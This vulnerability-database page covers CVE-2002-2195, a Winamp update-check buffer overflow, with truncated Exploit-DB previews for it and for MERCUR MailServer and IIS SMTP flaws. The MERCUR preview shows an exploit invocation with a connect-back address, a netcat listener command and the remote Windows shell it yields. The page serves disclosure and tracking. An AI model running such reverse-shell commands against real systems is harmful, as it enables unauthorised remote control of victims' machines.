CVE-2002-2195
Published 2002-12-31
Priority: P4 · 27 · medium · CVSS 2.0: 5
AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 4.69% (90.7th percentile)
Buffer overflow in the version update check for Winamp 2.80 and earlier allows remote attackers who can spoof www.winamp.com to execute arbitrary code via a long server response.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | — | — |
No detection rules found.
Exploit-DB
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
exploitdb·2002-07-16
CVE-2002-1073 3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5261/info
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)
# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
# nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\WINNT\system32>
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@
Exploit-DB
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)
exploitdb·2002-07-12
CVE-2002-1790 Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)
---
source: https://www.securityfocus.com/bid/5213/info
Microsoft Exchange 5.5 and the SMTP (Simple Mail Transfer Protocol) service included with IIS (Internet Information Services) 4.0 and 5.0 are vulnerable to an encapsulated SMTP address vulnerability.
The vulnerability was originally announced in Microsoft Security Bulletin MS99-027 and reported to affect Exchange Server 5.5. Microsoft released a patch to fix the vulnerability for Exchange Server 5.5 only. It has been recently reported that this vulnerability also affects the SMTP service included with Microsoft IIS 4.0 and 5.0. There exists no patch for the IIS SMTP service.
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue,
Exploit-DB
Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow
exploitdb·2002-07-03
CVE-2002-2195 Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5170/info
Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and other filetypes.
Winamp is vulnerable to a buffer overflow condition when checking for updated versions. A malicious server located at www.winamp.com may return a malicious response. Exploitation may result in the execution of arbitrary code as the Winamp process.
It may be possible to exploit this vulnerability if an attacker can control the resolution of the www.winamp.com domain, possibly through DNS cache poisoning.
/*
wampexp.c
July 3rd, 2002
Winamp 2.80a and all previous remote exploit (connect-back styles)
winamp has an option, enabled by default, which checks for the latest
ve
No writeups or analysis indexed.
2002-12-31: Published